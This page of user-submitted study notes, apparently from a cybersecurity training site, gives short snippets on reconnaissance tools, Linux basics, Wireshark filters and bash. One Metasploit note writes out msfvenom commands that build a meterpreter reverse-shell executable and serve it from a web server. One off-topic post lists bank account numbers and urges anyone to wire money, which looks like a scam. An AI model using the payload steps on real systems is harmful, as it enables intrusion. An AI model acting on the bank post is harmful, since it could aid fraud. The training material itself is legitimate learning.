Advanced Penetration Testing Notes

Information Gathering (part 3) Targeting

theharvester -d domain -l 500 -b all www.netcraft.com     What’s that site running?      domain maltego shodanhq.com   [view]

By: lgf | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: October 1, 2017

Information Gathering (part 2) Domain

– whois domain – nslookup domain – nslookup     set type=mx (mail) OR set type=ns (dns)     domain host -t ns domain host -l domain zonetransfer fierce -dns domain     [view]

By: lgf | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: October 1, 2017

Install apl

ex :apt-get install armitage [view]

By: Pb18 | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: October 1, 2017

Linux Basics

pwd-print work directory ls-list directory content ls -l  long listing ls -a =hidden directory ls / show content of given location eg:ls /etc cd – change directory cd .. – cd to parent       [view]

By: sasisk7 | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: October 1, 2017

Advanced PenTesting

Everything in linux is a file(disk drive, user, etc) rm -rf recursively removes everything present inside the directory Permissions (local privilege escalation):   -rw-r–r– (first part is for root i.e -rw, second part is for group i. [view]

By: cyb3rw0rm | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: October 1, 2017

Advanced PenTesting

Everything in linux is a file rm -rf recursively deletes everything present in a directory [view]

By: cyb3rw0rm | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: October 1, 2017

proc

ip.dst ip.src || OR && AND [view]

By: atif | Related Lesson: Traffic Capture (part 2) Analyzing Network Protocol with Wireshark | Modified: September 30, 2017

Transfer Money bank system

Hi Account information;Bank iban numbers and Swift Cod this For € TR 540001001927464449355007-For $ TR810001001927464449355006-For £ TR 27000100 192746 444 935 5008 ;Swift Cod;TCZBTR2AXXX    This account anyone transfer urgently money [view]

By: chazer | Related Lesson: Linux (part 1) | Modified: September 28, 2017

Metasploit (part 6)

~# msfvenom –help-formats ~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -f exe > meterpreter.exe ~# cp meterpreter.exe /var/www ~# service apache2 start ~# msfconsole msf> info exploit/multi/handler msf> [view]

By: Dormata | Related Lesson: Metasploit (part 6) msfvenom | Modified: September 28, 2017

proc

#!/bin/bash if [ ”$1” == ] echo ”Usage: ./ping.sh [network]” echo ”Example: ./ping.sh 192.168.1” chmod 700 [view]

By: atif | Related Lesson: Programming (part 2) Bash Scripting and If/Then Command | Modified: September 28, 2017

« First ‹ Previous 1 75 83 84 85 86 87 95 185 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel